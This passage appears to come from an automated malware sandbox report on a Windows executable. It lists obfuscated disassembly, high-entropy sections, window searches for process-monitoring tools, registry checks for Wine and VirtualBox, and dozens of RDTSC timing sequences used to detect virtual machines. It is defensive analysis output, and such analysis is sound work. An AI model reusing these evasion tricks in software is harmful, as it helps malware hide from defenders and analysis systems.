                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push edi; mov dword ptr [esp], 64604D33h0_2_005F896F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push eax; mov dword ptr [esp], 048AF376h0_2_005F8988
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E819 push esi; mov dword ptr [esp], edi0_2_0062E851
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E819 push 6395451Bh; mov dword ptr [esp], eax0_2_0062E878
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006860E1 push edi; mov dword ptr [esp], ebp0_2_006861C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C0FE push edi; ret 0_2_0061C10D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push edi; mov dword ptr [esp], ebp0_2_006BB89B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push 175DBF00h; mov dword ptr [esp], ecx0_2_006BB940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push ecx; mov dword ptr [esp], edi0_2_006BB99B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FB8B2 push cs; ret 0_2_005FB8C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678965 push esi; mov dword ptr [esp], ebx0_2_00678984
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678965 push 2B048274h; mov dword ptr [esp], ebx0_2_006789B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8144 push esp; retf 0_2_005F8145
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B950 push eax; mov dword ptr [esp], edx0_2_0061B966
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B950 push edi; mov dword ptr [esp], ecx0_2_0061B999
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push edi; mov dword ptr [esp], 64604D33h0_2_005F896F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push eax; mov dword ptr [esp], 048AF376h0_2_005F8988
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C159 push edx; ret 0_2_0061C168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697139 push eax; mov dword ptr [esp], ebx0_2_00697158
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A9E3 push edx; mov dword ptr [esp], ebp0_2_0065AA0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C09C5 push eax; mov dword ptr [esp], ebp0_2_006C0945
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push edx; mov dword ptr [esp], 4643DAE7h0_2_00625A6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push 47D61941h; mov dword ptr [esp], edi0_2_00625A8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push 3B4C854Dh; mov dword ptr [esp], esi0_2_00625AE2
                Source: file.exeStatic PE information: section name: entropy: 7.933330547933749
                Source: file.exeStatic PE information: section name: zeyoifdy entropy: 7.949718189685727

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47423F second address: 474243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474243 second address: 474249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474249 second address: 474254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7704E143B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473A53 second address: 473A7B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704DD53B7h 0x00000008 jmp 00007F7704DD53B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jne 00007F7704DD53A8h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBBAB second address: 5EBBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7704E143BDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBD44 second address: 5EBD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBD4C second address: 5EBD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBD51 second address: 5EBD79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AEh 0x00000007 jmp 00007F7704DD53B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC18E second address: 5EC1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143BFh 0x00000009 jmp 00007F7704E143C8h 0x0000000e jnp 00007F7704E143B6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F7704E143B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC1C8 second address: 5EC1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC1CC second address: 5EC1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC1D2 second address: 5EC1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F7704DD53ACh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC1EC second address: 5EC1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC354 second address: 5EC36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEA1E second address: 5EEA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEA23 second address: 5EEA7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F7704DD53B9h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F7704DD53ADh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7704DD53B3h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEA7C second address: 5EEA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEBAF second address: 5EEBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEBB3 second address: 5EEBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEBB9 second address: 5EEBBE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEBBE second address: 5EEC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 65047B14h 0x0000000e jmp 00007F7704E143BDh 0x00000013 push 00000003h 0x00000015 xor esi, dword ptr [ebp+122D364Dh] 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e mov dword ptr [ebp+122D1950h], edx 0x00000024 movzx esi, ax 0x00000027 popad 0x00000028 push 00000003h 0x0000002a mov ecx, 740EAB00h 0x0000002f push 5C5FB005h 0x00000034 jng 00007F7704E143C2h 0x0000003a jng 00007F7704E143BCh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEC93 second address: 5EECE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jno 00007F7704DD53A9h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F7704DD53A8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jmp 00007F7704DD53B0h 0x0000002f mov ch, bh 0x00000031 call 00007F7704DD53A9h 0x00000036 pushad 0x00000037 jbe 00007F7704DD53ACh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EECE6 second address: 5EED09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7704E143BFh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jl 00007F7704E143B6h 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED09 second address: 5EED5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7704DD53AFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F7704DD53B9h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F7704DD53B8h 0x00000020 pop ecx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED5B second address: 5EED61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED61 second address: 5EEDDC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jne 00007F7704DD53B4h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7704DD53A8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F7704DD53A8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push 00000000h 0x0000004b add di, 983Fh 0x00000050 push 00000003h 0x00000052 call 00007F7704DD53A9h 0x00000057 jg 00007F7704DD53B4h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEDDC second address: 5EEDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEDE0 second address: 5EEDFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F7704DD53AFh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEDFA second address: 5EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE00 second address: 5EEE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE0F second address: 5EEE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE13 second address: 5EEE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE17 second address: 5EEE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 jmp 00007F7704E143C9h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE43 second address: 5EEE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7704DD53A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnl 00007F7704DD53C2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704DD53B4h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE6F second address: 5EEEAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ecx, 349AA002h 0x0000000c lea ebx, dword ptr [ebp+1244E97Eh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F7704E143B8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D37F1h] 0x00000032 push eax 0x00000033 push eax 0x00000034 pushad 0x00000035 push ecx 0x00000036 pop ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEF6F second address: 5EEFDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ecx, dword ptr [ebp+122D388Dh] 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F7704DD53A8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jmp 00007F7704DD53B5h 0x00000030 push 00000003h 0x00000032 movzx edx, cx 0x00000035 mov esi, dword ptr [ebp+122D1DB7h] 0x0000003b call 00007F7704DD53A9h 0x00000040 push eax 0x00000041 push edx 0x00000042 jg 00007F7704DD53ACh 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEFDB second address: 5EF015 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7704E143CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704E143C9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60DE5B second address: 60DE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60DE66 second address: 60DE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E390 second address: 60E396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E396 second address: 60E3B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7704E143CDh 0x0000000c jmp 00007F7704E143C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E81C second address: 60E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F7704DD53ACh 0x0000000b jc 00007F7704DD53A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EB2B second address: 60EB30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EF08 second address: 60EF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7704DD53A8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F664 second address: 60F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143BFh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F67B second address: 60F681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118DA second address: 6118E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613108 second address: 61310C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61310C second address: 613132 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7704E143C2h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613132 second address: 61314D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704DD53B6h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61314D second address: 613167 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7704E143BEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613167 second address: 613185 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F7704DD53A6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F7704DD53ACh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613185 second address: 613197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613197 second address: 61319B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6132F3 second address: 6132F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6132F9 second address: 61330F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F7704DD53B4h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61502C second address: 615030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615030 second address: 61505F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7704DD53BCh 0x0000000f jmp 00007F7704DD53B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61505F second address: 615063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD12 second address: 5DAD2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F7704DD53ABh 0x0000000e jno 00007F7704DD53A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B53E second address: 61B593 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704E143B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F7704E143C7h 0x00000012 pop edx 0x00000013 jmp 00007F7704E143C3h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F7704E143BCh 0x00000022 popad 0x00000023 push esi 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A9C9 second address: 61A9CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61ACA7 second address: 61ACB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61ACB5 second address: 61ACB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61ACB9 second address: 61ACCF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7704E143B6h 0x00000008 jo 00007F7704E143B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61ACCF second address: 61ACD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7704DD53A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AE3A second address: 61AE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B124 second address: 61B128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B128 second address: 61B12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B12E second address: 61B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
